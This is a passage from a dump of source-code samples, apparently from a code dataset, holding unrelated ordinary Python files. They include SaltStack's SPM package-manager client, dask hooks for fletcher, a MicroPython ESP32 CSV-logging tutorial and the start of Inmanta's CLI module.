            print(sess.run(accuracy, feed_dict={x:batch_xs, y:batch_ys}))
        step += 1
1909211 | import sys
# Read one line of whitespace-separated integers from stdin and print them
# space-separated with duplicates removed, keeping first-occurrence order.
values = map(int, sys.stdin.readline().split())
# dict preserves insertion order on Python 3.7+, so dict.fromkeys replaces
# OrderedDict (and the redundant l1=[] / l2=[] pre-assignments).
unique = list(dict.fromkeys(values))
print(*unique, end=" ")
6526397 | import pandas as pd
import streamlit as st
@st.cache
def load_data(DATA_URL, nrows=None):
    """
    Read a CSV file from the given URL and return it as a DataFrame.

    :param DATA_URL: str -- URL or path of the CSV file
    :param nrows: int -- optional cap on the number of rows read
    :return: DataFrame
    """
    return pd.read_csv(DATA_URL, nrows=nrows)
3539893 | # -*- coding: utf-8 -*-
'''
This module provides the point of entry to SPM, the Salt Package Manager
.. versionadded:: 2015.8.0
'''
# Import Python libs
from __future__ import absolute_import, print_function
import os
import yaml
import tarfile
import shutil
import msgpack
import datetime
import hashlib
import logging
import pwd
import grp
import sys
# Import Salt libs
import salt.config
import salt.loader
import salt.utils
import salt.utils.http as http
import salt.syspaths as syspaths
import salt.ext.six as six
from salt.ext.six import string_types
from salt.ext.six.moves import input
from salt.ext.six.moves import zip
from salt.ext.six.moves import filter
# Get logging started
log = logging.getLogger(__name__)
class SPMException(Exception):
    '''
    Root of the SPM exception hierarchy; catch this to handle any
    SPM-specific failure.
    '''
class SPMInvocationError(SPMException):
    '''
    Raised on usage errors: wrong argument count, unknown command, etc.
    '''
class SPMPackageError(SPMException):
    '''
    Raised when a package file is invalid or installation fails.
    '''
class SPMDatabaseError(SPMException):
    '''
    Raised for package-database problems (e.g. the SPM database is missing).
    '''
class SPMOperationCanceled(SPMException):
    '''
    Raised when the user declines the confirmation prompt for an install
    or uninstall.
    '''
class SPMClient(object):
    '''
    Provide an SPM Client
    '''
    def __init__(self, ui, opts=None):  # pylint: disable=W0231
        # ui: SPMUserInterface implementation used for status/error output
        #     and confirmation prompts.
        # opts: configuration dict; loaded from the default spm config file
        #     when not supplied.
        self.ui = ui
        if not opts:
            opts = salt.config.spm_config(
                os.path.join(syspaths.CONFIG_DIR, 'spm')
            )
        self.opts = opts
        self.db_prov = self.opts.get('spm_db_provider', 'sqlite3')
        self.files_prov = self.opts.get('spm_files_provider', 'local')
        self._prep_pkgdb()
        self._prep_pkgfiles()
        self._init()

    def _prep_pkgdb(self):
        # Load the package-database provider modules via the salt loader.
        self.pkgdb = salt.loader.pkgdb(self.opts)

    def _prep_pkgfiles(self):
        # Load the package-files provider modules via the salt loader.
        self.pkgfiles = salt.loader.pkgfiles(self.opts)

    def _init(self):
        # Open connections to the configured database and files providers.
        self.db_conn = self._pkgdb_fun('init')
        self.files_conn = self._pkgfiles_fun('init')

    def run(self, args):
        '''
        Run the SPM command
        '''
        command = args[0]
        try:
            if command == 'install':
                self._install(args)
            elif command == 'local':
                self._local(args)
            elif command == 'remove':
                self._remove(args)
            elif command == 'build':
                self._build(args)
            elif command == 'update_repo':
                self._download_repo_metadata(args)
            elif command == 'create_repo':
                self._create_repo(args)
            elif command == 'files':
                self._list_files(args)
            elif command == 'info':
                self._info(args)
            else:
                raise SPMInvocationError('Invalid command \'{0}\''.format(command))
        except SPMException as exc:
            # All SPM errors surface through the UI instead of crashing.
            self.ui.error(str(exc))

    def _pkgdb_fun(self, func, *args, **kwargs):
        # Dispatch *func* to the configured db provider; fall back to the
        # loader's dict-style '<provider>.<func>' lookup when attribute
        # access is unavailable.
        try:
            return getattr(getattr(self.pkgdb, self.db_prov), func)(*args, **kwargs)
        except AttributeError:
            return self.pkgdb['{0}.{1}'.format(self.db_prov, func)](*args, **kwargs)

    def _pkgfiles_fun(self, func, *args, **kwargs):
        # Same dispatch pattern as _pkgdb_fun, for the files provider.
        try:
            return getattr(getattr(self.pkgfiles, self.files_prov), func)(*args, **kwargs)
        except AttributeError:
            return self.pkgfiles['{0}.{1}'.format(self.files_prov, func)](*args, **kwargs)

    def _local(self, args):
        '''
        Process local commands
        '''
        # Drop the leading 'local' token so args mirrors the non-local form.
        args.pop(0)
        command = args[0]
        if command == 'install':
            self._local_install(args)
        elif command == 'files':
            self._local_list_files(args)
        elif command == 'info':
            self._local_info(args)
        else:
            raise SPMInvocationError('Invalid local command \'{0}\''.format(command))

    def _install(self, args):
        '''
        Install a package from a repo
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package must be specified')

        packages = args[1:]
        # file_map maps package name -> local .spm path for file-based installs
        file_map = {}
        optional = []
        recommended = []
        to_install = []
        for pkg in packages:
            if pkg.endswith('.spm'):
                if self._pkgfiles_fun('path_exists', pkg):
                    # Derive the package name by stripping '<ver>-<rel>.spm'
                    # and any leading directories.
                    comps = pkg.split('-')
                    comps = '-'.join(comps[:-2]).split('/')
                    pkg_name = comps[-1]

                    formula_tar = tarfile.open(pkg, 'r:bz2')
                    formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(pkg_name))
                    formula_def = yaml.safe_load(formula_ref)

                    file_map[pkg_name] = pkg
                    to_, op_, re_ = self._check_all_deps(
                        pkg_name=pkg_name,
                        pkg_file=pkg,
                        formula_def=formula_def
                    )
                    to_install.extend(to_)
                    optional.extend(op_)
                    recommended.extend(re_)
                else:
                    raise SPMInvocationError('Package file {0} not found'.format(pkg))
            else:
                to_, op_, re_ = self._check_all_deps(pkg_name=pkg)
                to_install.extend(to_)
                optional.extend(op_)
                recommended.extend(re_)

        # filter(len, ...) drops the empty strings produced by dep parsing
        optional = set(filter(len, optional))
        self.ui.status('The following dependencies are optional:\n\t{0}\n'.format(
            '\n\t'.join(optional)
        ))
        recommended = set(filter(len, recommended))
        self.ui.status('The following dependencies are recommended:\n\t{0}\n'.format(
            '\n\t'.join(recommended)
        ))

        to_install = set(filter(len, to_install))
        msg = 'Installing packages:\n\t{0}\n'.format('\n\t'.join(to_install))
        if not self.opts['assume_yes']:
            self.ui.confirm(msg)

        repo_metadata = self._get_repo_metadata()

        for package in to_install:
            if package in file_map:
                # Local .spm file: install directly.
                self._install_indv_pkg(package, file_map[package])
            else:
                # Find the first repo that carries the package.
                for repo in repo_metadata:
                    repo_info = repo_metadata[repo]
                    if package in repo_metadata[repo]['packages']:
                        cache_path = '{0}/{1}'.format(
                            self.opts['spm_cache_dir'],
                            repo
                        )

                        # Download the package
                        dl_path = '{0}/{1}'.format(
                            repo_info['info']['url'],
                            repo_info['packages'][package]['filename']
                        )
                        out_file = '{0}/{1}'.format(
                            cache_path,
                            repo_info['packages'][package]['filename']
                        )
                        if not os.path.exists(cache_path):
                            os.makedirs(cache_path)

                        if dl_path.startswith('file://'):
                            # file:// repos are copied, not fetched over HTTP
                            dl_path = dl_path.replace('file://', '')
                            shutil.copyfile(dl_path, out_file)
                        else:
                            response = http.query(dl_path, text=True)
                            with salt.utils.fopen(out_file, 'w') as outf:
                                outf.write(response.get("text"))

                        # Kick off the install
                        self._install_indv_pkg(package, out_file)
        return

    def _local_install(self, args, pkg_name=None):
        '''
        Install a package from a file
        '''
        # NOTE(review): pkg_name is accepted but never used here.
        if len(args) < 2:
            raise SPMInvocationError('A package file must be specified')

        self._install(args)

    def _check_all_deps(self, pkg_name=None, pkg_file=None, formula_def=None):
        '''
        Starting with one package, check all packages for dependencies

        Returns a 3-tuple of lists:
        (packages to install, optional deps, recommended deps).
        '''
        if pkg_file and not os.path.exists(pkg_file):
            raise SPMInvocationError('Package file {0} not found'.format(pkg_file))

        self.repo_metadata = self._get_repo_metadata()
        if not formula_def:
            # No formula supplied: look the package up in the repo indexes.
            for repo in self.repo_metadata:
                if not isinstance(self.repo_metadata[repo]['packages'], dict):
                    continue
                if pkg_name in self.repo_metadata[repo]['packages']:
                    formula_def = self.repo_metadata[repo]['packages'][pkg_name]['info']

        if not formula_def:
            raise SPMInvocationError('Unable to read formula for {0}'.format(pkg_name))

        # Check to see if the package is already installed
        pkg_info = self._pkgdb_fun('info', pkg_name, self.db_conn)
        pkgs_to_install = []
        if pkg_info is None or self.opts['force']:
            pkgs_to_install.append(pkg_name)
        elif pkg_info is not None and not self.opts['force']:
            raise SPMPackageError(
                'Package {0} already installed, not installing again'.format(formula_def['name'])
            )

        optional_install = []
        recommended_install = []
        if 'dependencies' in formula_def or 'optional' in formula_def or 'recommended' in formula_def:
            # Build a name -> repo map of every package available anywhere.
            self.avail_pkgs = {}
            for repo in self.repo_metadata:
                if not isinstance(self.repo_metadata[repo]['packages'], dict):
                    continue
                for pkg in self.repo_metadata[repo]['packages']:
                    self.avail_pkgs[pkg] = repo

            needs, unavail, optional, recommended = self._resolve_deps(formula_def)

            if len(unavail) > 0:
                raise SPMPackageError(
                    'Cannot install {0}, the following dependencies are needed:\n\n{1}'.format(
                        formula_def['name'], '\n'.join(unavail))
                )

            if optional:
                optional_install.extend(optional)
                for dep_pkg in optional:
                    pkg_info = self._pkgdb_fun('info', formula_def['name'])
                    msg = dep_pkg
                    if isinstance(pkg_info, dict):
                        msg = '{0} [Installed]'.format(dep_pkg)
                    optional_install.append(msg)

            if recommended:
                recommended_install.extend(recommended)
                for dep_pkg in recommended:
                    pkg_info = self._pkgdb_fun('info', formula_def['name'])
                    msg = dep_pkg
                    if isinstance(pkg_info, dict):
                        msg = '{0} [Installed]'.format(dep_pkg)
                    recommended_install.append(msg)

            if needs:
                pkgs_to_install.extend(needs)
                for dep_pkg in needs:
                    pkg_info = self._pkgdb_fun('info', formula_def['name'])
                    msg = dep_pkg
                    if isinstance(pkg_info, dict):
                        msg = '{0} [Installed]'.format(dep_pkg)
                        # NOTE(review): unlike the optional/recommended
                        # branches above, this msg is never appended to any
                        # list -- looks like dead code; confirm upstream.

        return pkgs_to_install, optional_install, recommended_install

    def _install_indv_pkg(self, pkg_name, pkg_file):
        '''
        Install one individual package
        '''
        self.ui.status('... installing {0}'.format(pkg_name))
        formula_tar = tarfile.open(pkg_file, 'r:bz2')
        formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(pkg_name))
        formula_def = yaml.safe_load(formula_ref)

        for field in ('version', 'release', 'summary', 'description'):
            if field not in formula_def:
                raise SPMPackageError('Invalid package: the {0} was not found'.format(field))

        pkg_files = formula_tar.getmembers()
        # First pass: check for files that already exist
        existing_files = self._pkgfiles_fun('check_existing', pkg_name, pkg_files, formula_def)

        if existing_files and not self.opts['force']:
            raise SPMPackageError('Not installing {0} due to existing files:\n\n{1}'.format(
                pkg_name, '\n'.join(existing_files))
            )

        # We've decided to install
        self._pkgdb_fun('register_pkg', pkg_name, formula_def, self.db_conn)

        # No defaults for this in config.py; default to the current running
        # user and group
        uid = self.opts.get('spm_uid', os.getuid())
        gid = self.opts.get('spm_gid', os.getgid())
        uname = pwd.getpwuid(uid)[0]
        gname = grp.getgrgid(gid)[0]

        # Second pass: install the files
        for member in pkg_files:
            # Force ownership of every installed file to the configured
            # (or current) user/group.
            member.uid = uid
            member.gid = gid
            member.uname = uname
            member.gname = gname

            out_path = self._pkgfiles_fun('install_file',
                                          pkg_name,
                                          formula_tar,
                                          member,
                                          formula_def,
                                          self.files_conn)
            if out_path is not False:
                if member.isdir():
                    # Directories get an empty digest in the database.
                    digest = ''
                else:
                    self._verbose('Installing file {0} to {1}'.format(member.name, out_path), log.trace)
                    file_hash = hashlib.sha1()
                    digest = self._pkgfiles_fun('hash_file',
                                                os.path.join(out_path, member.name),
                                                file_hash,
                                                self.files_conn)
                self._pkgdb_fun('register_file',
                                pkg_name,
                                member,
                                out_path,
                                digest,
                                self.db_conn)

        formula_tar.close()

    def _resolve_deps(self, formula_def):
        '''
        Return a list of packages which need to be installed, to resolve all
        dependencies

        Returns (can_has, cant_has, optional, recommended) where can_has maps
        resolvable dependency names to the repo that provides them and
        cant_has lists unresolvable dependency names.
        '''
        pkg_info = self.pkgdb['{0}.info'.format(self.db_prov)](formula_def['name'])
        if not isinstance(pkg_info, dict):
            pkg_info = {}

        can_has = {}
        cant_has = []
        if 'dependencies' in formula_def and formula_def['dependencies'] is None:
            formula_def['dependencies'] = ''
        for dep in formula_def.get('dependencies', '').split(','):
            dep = dep.strip()
            if not dep:
                continue
            # Skip dependencies that are already installed.
            if self.pkgdb['{0}.info'.format(self.db_prov)](dep):
                continue

            if dep in self.avail_pkgs:
                can_has[dep] = self.avail_pkgs[dep]
            else:
                cant_has.append(dep)

        optional = formula_def.get('optional', '').split(',')
        recommended = formula_def.get('recommended', '').split(',')

        # Recursively resolve the dependencies of each resolvable dependency.
        inspected = []
        to_inspect = can_has.copy()
        while len(to_inspect) > 0:
            dep = next(six.iterkeys(to_inspect))
            del to_inspect[dep]

            # Don't try to resolve the same package more than once
            if dep in inspected:
                continue
            inspected.append(dep)

            repo_contents = self.repo_metadata.get(can_has[dep], {})
            repo_packages = repo_contents.get('packages', {})
            dep_formula = repo_packages.get(dep, {}).get('info', {})

            also_can, also_cant, opt_dep, rec_dep = self._resolve_deps(dep_formula)
            can_has.update(also_can)
            cant_has = sorted(set(cant_has + also_cant))
            optional = sorted(set(optional + opt_dep))
            recommended = sorted(set(recommended + rec_dep))

        return can_has, cant_has, optional, recommended

    def _traverse_repos(self, callback, repo_name=None):
        '''
        Traverse through all repo files and apply the functionality provided in
        the callback to them

        When repo_name is given, only that repo is passed to the callback.
        Repos with 'enabled: False' are skipped.
        '''
        repo_files = []
        if os.path.exists(self.opts['spm_repos_config']):
            repo_files.append(self.opts['spm_repos_config'])

        for (dirpath, dirnames, filenames) in os.walk('{0}.d'.format(self.opts['spm_repos_config'])):
            for repo_file in filenames:
                if not repo_file.endswith('.repo'):
                    continue
                repo_files.append(repo_file)

        if not os.path.exists(self.opts['spm_cache_dir']):
            os.makedirs(self.opts['spm_cache_dir'])

        for repo_file in repo_files:
            repo_path = '{0}.d/{1}'.format(self.opts['spm_repos_config'], repo_file)
            with salt.utils.fopen(repo_path) as rph:
                repo_data = yaml.safe_load(rph)
                for repo in repo_data:
                    if repo_data[repo].get('enabled', True) is False:
                        continue
                    if repo_name is not None and repo != repo_name:
                        continue
                    callback(repo, repo_data[repo])

    def _download_repo_metadata(self, args):
        '''
        Connect to all repos and download metadata
        '''
        def _update_metadata(repo, repo_info):
            # Fetch the SPM-METADATA index for one repo and cache it
            # locally as msgpack.
            dl_path = '{0}/SPM-METADATA'.format(repo_info['url'])
            if dl_path.startswith('file://'):
                dl_path = dl_path.replace('file://', '')
                with salt.utils.fopen(dl_path, 'r') as rpm:
                    metadata = yaml.safe_load(rpm)
            else:
                response = http.query(dl_path, text=True)
                metadata = yaml.safe_load(response.get('text', '{}'))

            cache_path = '{0}/{1}.p'.format(
                self.opts['spm_cache_dir'],
                repo
            )

            with salt.utils.fopen(cache_path, 'w') as cph:
                msgpack.dump(metadata, cph)

        repo_name = args[1] if len(args) > 1 else None
        self._traverse_repos(_update_metadata, repo_name)

    def _get_repo_metadata(self):
        '''
        Return cached repo metadata
        '''
        metadata = {}
        if not os.path.exists(self.opts['spm_cache_dir']):
            os.makedirs(self.opts['spm_cache_dir'])

        def _read_metadata(repo, repo_info):
            # Load the cached msgpack index for one repo into *metadata*.
            cache_path = '{0}/{1}.p'.format(
                self.opts['spm_cache_dir'],
                repo
            )

            if not os.path.exists(cache_path):
                raise SPMPackageError('SPM cache {0} not found'.format(cache_path))

            with salt.utils.fopen(cache_path, 'r') as cph:
                metadata[repo] = {
                    'info': repo_info,
                    'packages': msgpack.load(cph),
                }

        self._traverse_repos(_read_metadata)
        return metadata

    def _create_repo(self, args):
        '''
        Scan a directory and create an SPM-METADATA file which describes
        all of the SPM files in that directory.
        '''
        if len(args) < 2:
            raise SPMInvocationError('A path to a directory must be specified')

        if args[1] == '.':
            repo_path = os.environ['PWD']
        else:
            repo_path = args[1]

        repo_metadata = {}
        for (dirpath, dirnames, filenames) in os.walk(repo_path):
            for spm_file in filenames:
                if not spm_file.endswith('.spm'):
                    continue
                spm_path = '{0}/{1}'.format(repo_path, spm_file)
                if not tarfile.is_tarfile(spm_path):
                    continue
                # Package name is the filename minus '-<version>-<release>.spm'
                comps = spm_file.split('-')
                spm_name = '-'.join(comps[:-2])
                spm_fh = tarfile.open(spm_path, 'r:bz2')
                formula_handle = spm_fh.extractfile('{0}/FORMULA'.format(spm_name))
                formula_conf = yaml.safe_load(formula_handle.read())
                repo_metadata[spm_name] = {
                    'info': formula_conf.copy(),
                }
                repo_metadata[spm_name]['filename'] = spm_file

        metadata_filename = '{0}/SPM-METADATA'.format(repo_path)
        with salt.utils.fopen(metadata_filename, 'w') as mfh:
            yaml.dump(repo_metadata, mfh, indent=4, canonical=False, default_flow_style=False)
        log.debug('Wrote {0}'.format(metadata_filename))

    def _remove(self, args):
        '''
        Remove a package
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package must be specified')

        packages = args[1:]
        msg = 'Removing packages:\n\t{0}'.format('\n\t'.join(packages))

        if not self.opts['assume_yes']:
            self.ui.confirm(msg)

        for package in packages:
            self.ui.status('... removing {0}'.format(package))

            if not self._pkgdb_fun('db_exists', self.opts['spm_db']):
                raise SPMDatabaseError('No database at {0}, cannot remove {1}'.format(self.opts['spm_db'], package))

            # Look at local repo index
            pkg_info = self._pkgdb_fun('info', package, self.db_conn)
            if pkg_info is None:
                raise SPMInvocationError('Package {0} not installed'.format(package))

            # Find files that have not changed and remove them
            files = self._pkgdb_fun('list_files', package, self.db_conn)
            dirs = []
            for filerow in files:
                if self._pkgfiles_fun('path_isdir', filerow[0]):
                    dirs.append(filerow[0])
                    continue
                # Only delete files whose on-disk hash still matches the one
                # recorded at install time (i.e. not modified by the user).
                file_hash = hashlib.sha1()
                digest = self._pkgfiles_fun('hash_file', filerow[0], file_hash, self.files_conn)
                if filerow[1] == digest:
                    self._verbose('Removing file {0}'.format(filerow[0]), log.trace)
                    self._pkgfiles_fun('remove_file', filerow[0], self.files_conn)
                else:
                    self._verbose('Not removing file {0}'.format(filerow[0]), log.trace)
                self._pkgdb_fun('unregister_file', filerow[0], package, self.db_conn)

            # Clean up directories (deepest first)
            for dir_ in sorted(dirs, reverse=True):
                self._pkgdb_fun('unregister_file', dir_, package, self.db_conn)
                try:
                    self._verbose('Removing directory {0}'.format(dir_), log.trace)
                    os.rmdir(dir_)
                except OSError:
                    # Leave directories in place that still have files in them
                    self._verbose('Cannot remove directory {0}, probably not empty'.format(dir_), log.trace)

            self._pkgdb_fun('unregister_pkg', package, self.db_conn)

    def _verbose(self, msg, level=log.debug):
        '''
        Display verbose information

        The message always goes to the logger at *level*; it is also shown
        on the UI when the 'verbose' option is set.
        '''
        if self.opts.get('verbose', False) is True:
            self.ui.status(msg)
        level(msg)

    def _local_info(self, args):
        '''
        List info for a package file
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package filename must be specified')

        pkg_file = args[1]

        if not os.path.exists(pkg_file):
            raise SPMInvocationError('Package file {0} not found'.format(pkg_file))

        # Package name is the filename minus '-<version>-<release>.spm' and
        # any leading directories.
        comps = pkg_file.split('-')
        comps = '-'.join(comps[:-2]).split('/')
        name = comps[-1]

        formula_tar = tarfile.open(pkg_file, 'r:bz2')
        formula_ref = formula_tar.extractfile('{0}/FORMULA'.format(name))
        formula_def = yaml.safe_load(formula_ref)

        self.ui.status(self._get_info(formula_def))

    def _info(self, args):
        '''
        List info for a package
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package must be specified')

        package = args[1]

        pkg_info = self._pkgdb_fun('info', package, self.db_conn)
        if pkg_info is None:
            raise SPMPackageError('package {0} not installed'.format(package))
        self.ui.status(self._get_info(pkg_info))

    def _get_info(self, formula_def):
        '''
        Get package info

        Returns a human-readable, multi-line description; missing fields
        are rendered as 'None'.
        '''
        fields = (
            'name',
            'os',
            'os_family',
            'release',
            'version',
            'dependencies',
            'os_dependencies',
            'os_family_dependencies',
            'summary',
            'description',
        )
        for item in fields:
            if item not in formula_def:
                formula_def[item] = 'None'

        if 'installed' not in formula_def:
            formula_def['installed'] = 'Not installed'

        return ('Name: {name}\n'
                'Version: {version}\n'
                'Release: {release}\n'
                'Install Date: {installed}\n'
                'Supported OSes: {os}\n'
                'Supported OS families: {os_family}\n'
                'Dependencies: {dependencies}\n'
                'OS Dependencies: {os_dependencies}\n'
                'OS Family Dependencies: {os_family_dependencies}\n'
                'Summary: {summary}\n'
                'Description:\n'
                '{description}').format(**formula_def)

    def _local_list_files(self, args):
        '''
        List files for a package file
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package filename must be specified')

        pkg_file = args[1]
        if not os.path.exists(pkg_file):
            raise SPMPackageError('Package file {0} not found'.format(pkg_file))
        formula_tar = tarfile.open(pkg_file, 'r:bz2')
        pkg_files = formula_tar.getmembers()

        for member in pkg_files:
            self.ui.status(member.name)

    def _list_files(self, args):
        '''
        List files for an installed package
        '''
        if len(args) < 2:
            raise SPMInvocationError('A package name must be specified')

        package = args[1]

        files = self._pkgdb_fun('list_files', package, self.db_conn)
        if files is None:
            raise SPMPackageError('package {0} not installed'.format(package))
        else:
            for file_ in files:
                if self.opts['verbose']:
                    # Verbose mode prints the whole database row, not just
                    # the path.
                    status_msg = ','.join(file_)
                else:
                    status_msg = file_[0]
                self.ui.status(status_msg)

    def _build(self, args):
        '''
        Build a package
        '''
        if len(args) < 2:
            raise SPMInvocationError('A path to a formula must be specified')

        self.abspath = args[1].rstrip('/')
        comps = self.abspath.split('/')
        self.relpath = comps[-1]

        formula_path = '{0}/FORMULA'.format(self.abspath)
        if not os.path.exists(formula_path):
            raise SPMPackageError('Formula file {0} not found'.format(formula_path))
        with salt.utils.fopen(formula_path) as fp_:
            formula_conf = yaml.safe_load(fp_)

        for field in ('name', 'version', 'release', 'summary', 'description'):
            if field not in formula_conf:
                raise SPMPackageError('Invalid package: a {0} must be defined'.format(field))

        out_path = '{0}/{1}-{2}-{3}.spm'.format(
            self.opts['spm_build_dir'],
            formula_conf['name'],
            formula_conf['version'],
            formula_conf['release'],
        )

        if not os.path.exists(self.opts['spm_build_dir']):
            os.mkdir(self.opts['spm_build_dir'])

        self.formula_conf = formula_conf

        formula_tar = tarfile.open(out_path, 'w:bz2')

        try:
            # Modern tarfile takes filter=; older versions used exclude=,
            # hence the TypeError fallback below.
            formula_tar.add(formula_path, formula_conf['name'], filter=self._exclude)
            formula_tar.add(self.abspath, formula_conf['name'], filter=self._exclude)
        except TypeError:
            formula_tar.add(formula_path, formula_conf['name'], exclude=self._exclude)
            formula_tar.add(self.abspath, formula_conf['name'], exclude=self._exclude)
        formula_tar.close()

        self.ui.status('Built package {0}'.format(out_path))

    def _exclude(self, member):
        '''
        Exclude based on opts

        Used both as tarfile's filter= (receives TarInfo, returns the member
        or None) and legacy exclude= (receives a path string).
        '''
        if isinstance(member, string_types):
            return None

        for item in self.opts['spm_build_exclude']:
            if member.name.startswith('{0}/{1}'.format(self.formula_conf['name'], item)):
                return None
            elif member.name.startswith('{0}/{1}'.format(self.abspath, item)):
                return None
        return member
class SPMUserInterface(object):
    '''
    Abstract interface for user interaction.  Concrete front-ends (such as
    the command line) implement status/error reporting and confirmation.
    '''
    def status(self, msg):
        '''
        Display a progress/status message from SPMClient.
        '''
        raise NotImplementedError()

    def error(self, msg):
        '''
        Display an SPM error message.
        '''
        raise NotImplementedError()

    def confirm(self, action):
        '''
        Ask the user to confirm *action* before an SPMClient operation runs.
        Implementations return normally on confirmation and raise
        SPMOperationCanceled(<msg>) when the user declines.
        '''
        raise NotImplementedError()
class SPMCmdlineInterface(SPMUserInterface):
    '''
    Command-line front-end for SPMClient: status to stdout, errors to
    stderr, confirmation via an interactive prompt.
    '''
    def status(self, msg):
        print(msg)

    def error(self, msg):
        print(msg, file=sys.stderr)

    def confirm(self, action):
        print(action)
        answer = input('Proceed? [N/y] ')
        if not answer.lower().startswith('y'):
            raise SPMOperationCanceled('canceled')
| StarcoderdataPython |
4928896 | <filename>fletcher/_dask_compat.py
from dask.dataframe.extensions import make_array_nonempty
from fletcher.base import FletcherChunkedDtype, FletcherContinuousDtype
@make_array_nonempty.register(FletcherChunkedDtype)
def _0(dtype):
    # Dask hook: produce a small non-empty example array for a
    # FletcherChunkedDtype so dask can construct meta objects.
    return dtype.example()
@make_array_nonempty.register(FletcherContinuousDtype)
def _1(dtype):
    # Same dask hook as above, registered for FletcherContinuousDtype.
    return dtype.example()
| StarcoderdataPython |
9601485 | '''
12.80 - Write/append data to a CSV file.
The ESP32 contains a flash memory file system that is accessible via micropython.
In this example, I will show you how to store dymmy sensor data to a CSV file.
You can retrieve the data by downloading the file to your computer, or
by using a seperate program (I provide this in the next lecture).
Components
----------
- ESP32
- Nothing else.
Documentation:
* Micropython "open" function: http://docs.micropython.org/en/latest/library/builtins.html?highlight=open#open
* Python "open" function: https://docs.python.org/3/library/functions.html#open
* Flash partitions: http://docs.micropython.org/en/latest/library/esp32.html#flash-partitions
* ESP flash size: https://mpython.readthedocs.io/en/master/library/micropython/esp.html#esp.flash_size
* uos.stat: http://docs.micropython.org/en/latest/library/uos.html#uos.stat
* CPython os.stat: https://docs.python.org/3/library/os.html#os.stat
Beware:
To the best of my knowledge, there is no function that returns the amount of flash space available for
your script to use. So, you need to consider tracking the space that your data file takes up programmatically.
A way to do this is to use the uos.stat() function, which returns information about a given file. I give an
example of how to use this function below.
Course:
MicroPython with the ESP32
https://techexplorations.com
'''
import random
from esp32 import Partition
import esp
import uos
filename = "csv_data_file.txt"

# Get some statistics:
print("Available flash space: ", esp.flash_size())  # Total amount of flash available

partition = Partition(Partition.RUNNING)
print(partition.info())  # Information about the running flash partition that stores the files.

file_stats = uos.stat(filename)
print("File size before write: ", file_stats[6])  # Index 6 of the tuple is the file size in bytes.

# Append 10 lines of dummy comma-delimited sensor data.
# Open the file once with "with": guarantees it is closed even if a write
# fails (previously it was re-opened every iteration and leaked on error).
with open(filename, "a") as file:
    for x in range(10):
        random_temp = random.randint(0, 50)
        random_humi = random.randint(20, 90)
        random_pres = random.randint(900, 1100)  # in hPa
        file.write("{},{},{}\n".format(random_temp, random_humi, random_pres))

file_stats = uos.stat(filename)
print("File size after write: ", file_stats[6])  # Index 6 of the tuple is the file size in bytes.
6405602 | """
Copyright 2017 Inmanta
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Contact: <EMAIL>
Command line development guidelines
###################################
do's and don'ts
----------------
MUST NOT: sys.exit => use command.CLIException
SHOULD NOT: print( => use logger for messages, only print for final output
Entry points
------------
@command annotation to register new command
"""
import argparse
import asyncio
import json
import logging
import os
import signal
import socket
import sys
import threading
import time
import traceback
from asyncio import ensure_future
from configparser import ConfigParser
from threading import Timer
from types import FrameType
from typing import Any, Callable, Coroutine, Dict, Optional
import colorlog
import yaml
from tornado import gen
from tornado.ioloop import IOLoop
from tornado.util import TimeoutError
import inmanta.compiler as compiler
from inmanta import const, module, moduletool, protocol
from inmanta.ast import CompilerException, Namespace
from inmanta.ast import type as inmanta_type
from inmanta.command import CLIException, Commander, ShowUsageException, command
from inmanta.compiler import do_compile
from inmanta.config import Config, Option
from inmanta.const import EXIT_START_FAILED
from inmanta.export import ModelExporter, cfg_env
from inmanta.server.bootloader import InmantaBootloader
from inmanta.util import get_compiler_version
from inmanta.warnings import WarningsManager
try:
import rpdb
except ImportError:
rpdb = None
LOGGER = logging.getLogger("inmanta")
@command("server", help_msg="Start the inmanta server")
def start_server(options: argparse.Namespace) -> None:
if options.config_file and not os.path.exists(options.config_file):
LOGGER.warning("Config file %s doesn't exist", options.config_file)
if options.config_dir and not os.path.isdir(options.config_dir):
LOGGER.warning("Config directory %s doesn't exist", options.config_dir)
ibl = InmantaBootloader()
setup_signal_handlers(ibl.stop)
ioloop = IOLoop.current()
# handle startup exceptions
def _handle_startup_done(fut: asyncio.Future) -> None:
if fut.cancelled():
safe_shutdown(ioloop, ibl.stop)
else:
exc = fut.exception()
if exc is not None:
LOGGER.exception("Server setup failed", exc_info=exc)
traceback.print_exception(type(exc), exc, exc.__traceback__)
safe_shutdown(ioloop, ibl.stop)
else:
LOGGER.info("Server startup complete")
ensure_future(ibl.start()).add_done_callback(_handle_startup_done)
ioloop.start()
LOGGER.info("Server shutdown complete")
if not ibl.started:
exit(EXIT_START_FAILED)
@command("agent", help_msg="Start the inmanta agent")
def start_agent(options: argparse.Namespace) -> None:
from inmanta.agent import agent
a = agent.Agent()
setup_signal_handlers(a.stop)
IOLoop.current().add_callback(a.start)
IOLoop.current().start()
LOGGER.info("Agent Shutdown complete")
def dump_threads() -> None:
    """Write a stack trace for every live thread to stdout."""
    print("----- Thread Dump ----")
    for thread in threading.enumerate():
        print("---", thread)
        # Daemon helpers that never really started may have no ident yet.
        if thread.ident:
            traceback.print_stack(sys._current_frames()[thread.ident], file=sys.stdout)
        print()
    sys.stdout.flush()
async def dump_ioloop_running() -> None:
    """Write every task currently scheduled on the running asyncio loop to stdout."""
    print("----- Async IO tasks ----")
    for scheduled_task in asyncio.all_tasks():
        print(scheduled_task)
    print()
    sys.stdout.flush()
def context_dump(ioloop: IOLoop) -> None:
    """Dump diagnostic state: thread stacks now, async tasks via the ioloop."""
    dump_threads()
    # asyncio.all_tasks only exists on newer Pythons; the task dump must run
    # on the loop itself, and this may be called from a signal handler, hence
    # add_callback_from_signal.
    if hasattr(asyncio, "all_tasks"):
        ioloop.add_callback_from_signal(dump_ioloop_running)
def setup_signal_handlers(shutdown_function: Callable[[], Coroutine[Any, Any, None]]) -> None:
    """
    Make sure that shutdown_function is called when a SIGTERM or a SIGINT interrupt occurs.

